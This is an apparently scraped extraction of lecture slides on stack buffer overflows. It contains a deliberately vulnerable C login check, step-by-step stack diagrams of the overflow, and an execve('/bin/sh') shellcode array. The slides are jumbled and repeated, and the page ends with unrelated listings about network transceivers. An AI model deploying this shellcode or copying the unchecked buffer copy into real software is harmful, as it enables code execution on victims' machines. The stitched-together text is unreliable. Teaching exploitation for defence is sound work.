Upload File

#include // tolower #include

17
login rip sfp name[i] rip sfp sfp main() login %esp %ebp %eip verify() #include <ctype.h> // tolower #include <string.h> // strcmp #include <stdio.h> // fgets, fputs void reveal_secret() { fputs("SUPER SECRET = 42\n", stdout); } int verify(const char* name) { char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0; } int main() { char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0; } i user 256 bytes

Upload: others

Post on 19-Oct-2020

1 views

Category:

Documents


0 download

Report

TRANSCRIPT

  • login

    rip

    sfp

    name[i]

    rip

    sfp

    sfpmain()

    login

    %esp

    %ebp

    %eip

    verify()

    #include // tolower#include // strcmp#include // fgets, fputs

    void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}

    int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}

    int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}

    i

    user

    256

    byte

    s

  • login

    rip

    sfp

    name[i]

    rip

    sfp

    sfpmain()

    login

    %esp

    %ebp

    %eip

    verify()

    #include // tolower#include // strcmp#include // fgets, fputs

    void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}

    int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}

    int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}

    i = 0

    user

    256

    byte

    s

    a0

  • login

    rip

    sfp

    name[i]

    rip

    sfp

    sfpmain()

    login

    %esp

    %ebp

    %eip

    verify()

    #include // tolower#include // strcmp#include // fgets, fputs

    void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}

    int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}

    int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}

    i = 1

    user

    256

    byte

    s

    c2 a0

  • login

    rip

    sfp

    name[i]

    rip

    sfp

    sfpmain()

    login

    %esp

    %ebp

    %eip

    verify()

    #include // tolower#include // strcmp#include // fgets, fputs

    void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}

    int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}

    int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}

    i = 2

    user

    256

    byte

    s

    c2 a0d7

  • login

    rip

    sfp

    name[i]

    rip

    sfp

    sfpmain()

    login

    %esp

    %ebp

    %eip

    verify()

    #include // tolower#include // strcmp#include // fgets, fputs

    void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}

    int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}

    int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}

    i = 3

    user

    256

    byte

    s

    c2 a0d782

  • login

    #include // tolower#include // strcmp#include // fgets, fputs

    void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}

    int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}

    int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}

    ff 7e6408

    name[i]

    rip

    sfp

    sfpmain()

    %esp

    %ebp

    %eip

    verify()

    i

    user

    256

    byte

    s

    70 e3d5cc

    c2 a0d782

    b3 6b0691

    a0c2d782ffa86db2307abba9ad7c

    ab 627b7a

    f7 e193

    Exploit

  • name[i]

    rip

    sfp

    %esp

    %ebp

    %eip

    #include // tolower#include // strcmp#include // fgets, fputs

    void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}

    int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}

    int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}

    i

    login

    ff 7e6408

    sfpmain()

    verify()

    user

    256

    byte

    s

    70 e3d5cc

    c2 a0d782

    b3 6b0691

    ab 627b7a

    f7 e19300

  • &"xyzzy"

    user

    rip

    %esp

    %ebp

    %eip

    sfpstrcmp()

    strcmp

    #include // tolower#include // strcmp#include // fgets, fputs

    void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}

    int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}

    int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}

    i

    login

    ff 7e6408

    sfpmain()

    verify()

    user

    256

    byte

    s

    70 e3d5cc

    c2 a0d782

    b3 6b0691

    ab 627b7a

    f7 e19300

  • &"xyzzy"

    user

    rip

    %esp

    %ebp

    %eip

    sfp

    #include // tolower#include // strcmp#include // fgets, fputs

    void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}

    int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}

    int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}

    i

    login

    ff 7e6408

    sfpmain()

    verify()

    user

    256

    byte

    s

    70 e3d5cc

    c2 a0d782

    b3 6b0691

    ab 627b7a

    f7 e19300

  • &"xyzzy"

    user

    rip

    %esp

    %ebp

    %eip

    sfp

    #include // tolower#include // strcmp#include // fgets, fputs

    void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}

    int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}

    int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}

    i

    user

    256

    byte

    s

    c2 a0d782

    b3 6b0691

    login

    ff 7e6408

    sfpmain()

    verify() 70 e3d5cc

    ab 627b7a

    f7 e19300

  • 70 e3d5cc

    &"xyzzy"

    user

    rip

    %esp

    %ebp

    %eip

    sfp

    #include // tolower#include // strcmp#include // fgets, fputs

    void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}

    int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}

    int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}

    i

    user

    256

    byte

    s

    c2 a0d782

    b3 6b0691

    login

    ff 7e6408

    sfpmain()

    verify()

    ab 627b7a

    f7 e19300

  • ff 7e6408

    &"xyzzy"

    user

    rip

    %esp

    %ebp

    %eip

    sfp

    #include // tolower#include // strcmp#include // fgets, fputs

    void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}

    int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}

    int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}

    i

    70 e3d5cc

    user

    256

    byte

    s

    c2 a0d782

    b3 6b0691

    login

    sfpmain()

    verify()

    ab 627b7a

    f7 e19300

  • &"xyzzy"

    user

    rip

    %esp

    %ebp

    %eip

    sfp

    #include // tolower#include // strcmp#include // fgets, fputs

    void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}

    int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}

    int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}

    i

    login

    ff 7e6408

    sfpmain()

    verify()

    user

    256

    byte

    s

    70 e3d5cc

    c2 a0d782

    b3 6b0691

    ab 627b7a

    f7 e19300

    a0c2d782ffa86db2307abba9ad7c

    Exploit

  • gcc -S shell.c

    execve("/bin/sh", ...)

    char shellcode[] = "\xeb\x1f" /* jmp 0x1f (2) */ "\x5e" /* popl %esi (1) */ "\x89\x76\x08" /* movl %esi,0x8(%esi) (3) */ "\x31\xc0" /* xorl %eax,%eax (2) */ "\x88\x46\x07" /* movb %eax,0x7(%esi) (3) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) (3) */ "\xb0\x0b" /* movb $0xb,%al (2) */ "\x89\xf3" /* movl %esi,%ebx (2) */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx (3) */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx (3) */ "\xcd\x80" /* int 0x80 (2) */ "\x31\xdb" /* xorl ebx,ebx (2) */ "\x89\xd8" /* movl %ebx,%eax (2) */ "\x40" /* inc %eax (1) */ "\xcd\x80" /* int 0x80 (2) */ "\xe8\xdc\xff\xff\xff" /* call -0x24 (5) */ "/bin/sh"; /* .string \"/bin/sh\" (8) */

    shell.c

  • &"xyzzy"

    user

    rip

    %esp

    %ebp

    %eip

    sfp

    #include // tolower#include // strcmp#include // fgets, fputs

    void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}

    int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}

    int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}

    i

    main()

    verify()

    256

    byte

    s

    login

    ff 7e6408

    sfpmain()

    verify()

    user

    70 e3d5cc

    c2 a0d782

    b3 6b0691

    ab 627b7a

    f7 e19300

  • &"xyzzy"

    user

    rip

    %esp

    %ebp

    %eip

    sfp

    #include // tolower#include // strcmp#include // fgets, fputs

    void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}

    int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}

    int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}

    i

    login

    ff 7e6408

    sfpmain()

    verify()

    user

    256

    byte

    s

    70 e3d5cc

    c2 a0d782

    b3 4b0691

    ab 427b5a

    f7 e19300sh # _

  • &"xyzzy"

    user

    rip

    %esp

    %ebp

    %eip

    sfp

    #include // tolower#include // strcmp#include // fgets, fputs

    void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}

    int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}

    int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}

    i

    login

    ff 7e6408

    sfpmain()

    verify()

    user

    256

    byte

    s

    70 e3d5cc

    c2 a0d782

    b3 4b0691

    ab 427b5a

    f7 e19300sh # _

    p!a"


10GBASE-LR SFP+ 1310nm 10km DOM Transceiver10GBASE-LR SFP+ 1310nm 10km DOM Transceiver 1 10GBASE-LR SFP+ 1310NM 10KM DOM TRANSCEIVER Application •Hot-pluggable SFP+ footprint •Supports

10GBASE-SR SFP+ 850nm 300m DOM Transceiver · SFP-10GSR-85 Dual-Rate 1000BASE-SX and 10GBASE-SR SFP+ 850nm 300m DOM Transceiver SFP-10GLR-31 Dual-Rate 1000BASE-LX and 10GBASE-LR SFP+

10GBASE-T SFP+ Copper RJ-45 80m Transceiver · SFP-10GLR-31 Dual-Rate 1000BASE-LX and 10GBASE-LR SFP+ 1310nm 10km DOM Transceiver SFP-10G-T 10GBASE-T SFP+ Copper RJ-45 30m Transceiver

User Guide TN-SFP-BC55 and TN-SFP-BC55-I - · PDF fileUser Guide . TN-SFP-BC55 and TN-SFP-BC55-I . SFP Transceiver Modules ... The TN-SFP-BC55-I integrates OTDR functionality into

24-Port Gigabit TP/SFP + 4-Port 10G SFP+ Slot ... - PLANET

Top Value HPE Aruba PVD Marzo 2016 - AELIS...• Enrutamiento estático Nivel 3 y RIP • 4 x 10GbE SFP+ Uplinks • Modelos PoE+ • Stacking directo de hasta 9 equipos con IRF •

SFP-GE10KT13R14-GT is programmed to be fully …...SFP-GE10KT13R14-GT 1-port 10KM Bidirectional GE SFP (TX1310 / RX1490) Juniper Compatible The GigaTech Products SFP-GE10KT13R14-GT

RIP RIP RIP COURSES - Animal Aid

FS S5800 Series 48xGigabit SFP with 4x10GbE SFP+ Switch

Engineering Divisions - Amazon S3€¦ · Fibre Channel, 10 Gbps Ethernet where telecom applications adopt mainly. SFP+ Main Features: •Nextron’s SFP+ series include connectors,

PRE-SFP-Dxx-120 SFP, DWDM 100GHz, 1528.77nm – 1563.86nm

Cisco SFP and SFP+ Transceiver Module Installation Notes · Cisco SFP and SFP+ Transceiver Module Installation Notes 78-15160-07 Overview DWDM-SFP-4612= Longwave 1546.12 nm laser

ATGBICS Huawei SFP-10G-AOC3M-HW Compatible SFP+ Active

10.3Gb/s SFP+ BIDI Transceiver - SFP | SFP Supplier › ... › 12 › APSPBxxB33CDL70.pdfTx-1270 / Rx-1330 Tx-1330 / Rx-1270 10.3GB/S SFP+ BIDI TRANSCEIVER Single LC connector Hot-pluggable

10G SFP+ Fiber Optic Transceivers and SFP+ DAC Data Sheet

Installing the SFP, SFP+, and XFP Modules in Cisco CPT Platforms · Installing the GBICs, SFP, SFP+, XFP, CXP, CFP, and CPAKSFP, SFP+, or XFP Optics Modules in Cisco ONSCPT Platforms

Top Value HPE Aruba PVP Marzo 2016...• Enrutamiento estático Nivel 3 y RIP • 4 x 10GbE SFP+ Uplinks • Modelos PoE+ • Stacking directo de hasta 9 equipos con IRF • OpenFlow

Baseline Switch 2816-SFP+ and 2824-SFP+ User Guide

SFP - Portfolio

Elección del switch Ruckus ICX correcto para ......1G, ampliable hasta 4 puertos SFP+ de 10G con licencia, budget PoE de 370W, L3 básico (enrutamiento estático y RIP) Switch ICX

2010-03-31 - Cisco€¦ · GE SFP,LC connector LX/LH transceiver GE SFP, LC connector SX transceiver 1000BASE-ZX SFP 1000BASE-T SFP CWDM-SFP-1470= CWDM-SFP-1490= CWDM-SFP-1510= CWDM-SFP-1530=

EX-SFP-GE10KT13R15-GT SFP 1000BASE-BX TX1310/RX1550 … · EX-SFP-GE10KT13R15-GT SFP 1000BASE-BX TX1310/RX1550 10km Juniper EX Compatible The GigaTech Products EX-SFP-GE10KT13R15-GT

SFP GE SFP Guide - cambiumnetworks.com

Cisco SFP and SFP+ Transceiver Module Installation · PDF fileCisco SFP and SFP+ Transceiver Module Installation Notes ... DWDM-SFP-5817= Longwave 1558.17-nm laser ... Cisco SFP and

승인원 SFP LC 4549 1.25G 20km - fottufottu.com/wp-content/uploads/2015/09/SFP-T45-R49.pdf · 2015. 9. 14. · SFP T1450 R1490 1.25G_AnTS SFP-T45-R49 1450TX/1490RX SFP T1490 R1450

RIP version 1 - Frank Schneemann PDF/cisco 2-5.pdf · RIP version 1 Routing Protocols and ... Classful routing protocols do not include the subnet mask in routing updates. The receiving

SFP-10G-LR-PLU 10Gb/s 1310nm SFP+ 10km Transceiver

Cisco Catalyst 3750€¦ · Cisco Catalyst 3750-48TS 48 10/100 4 SFP Cisco Catalyst 3750-24TS 24 10/100 2 SFP Cisco Catalyst 3750 SMI EMI SMI QoS ACL RIP EMI IP. 2 ... 10000 ft 3049

SFP and SFP+ Transceiver Module_Installation Notes.pdf

SFP-DD Rev 1.0 SFP-DD MSAsfp-dd.com/wp-content/uploads/2017/09/SFP-DDrev1-0-9-14-17.pdf · SFP-DD Rev 1.0 . 1 . SFP-DD MSA . SFP-DD Hardware Specification . for . SFP DOUBLE DENSITY

SFP/XFP/SFP+/SFP28/QSFP+/QSFP28 Cloud Programmer

10GBase-R Fiber Optics 10G SFP+ to 10G SFP+ Media Converter

SFP HD FIRE PUMP SFP 250x350HD

SFP-DD Rev 1.1 SFP-DD MSA - Gigalight · Because the SFP-DD module has 2 rows of pads, the additional SFP-DD pads will have an intermittent connection with the legacy SFP pins in

Atic 23 11 2011 23-11... · 2020. 4. 7. · SFP-Classes EN 13779 Today: Big HVAC systems SFP-3 ... SFP-4 and small ones between SFP-5 ... SFP-7 According to the energy saving decree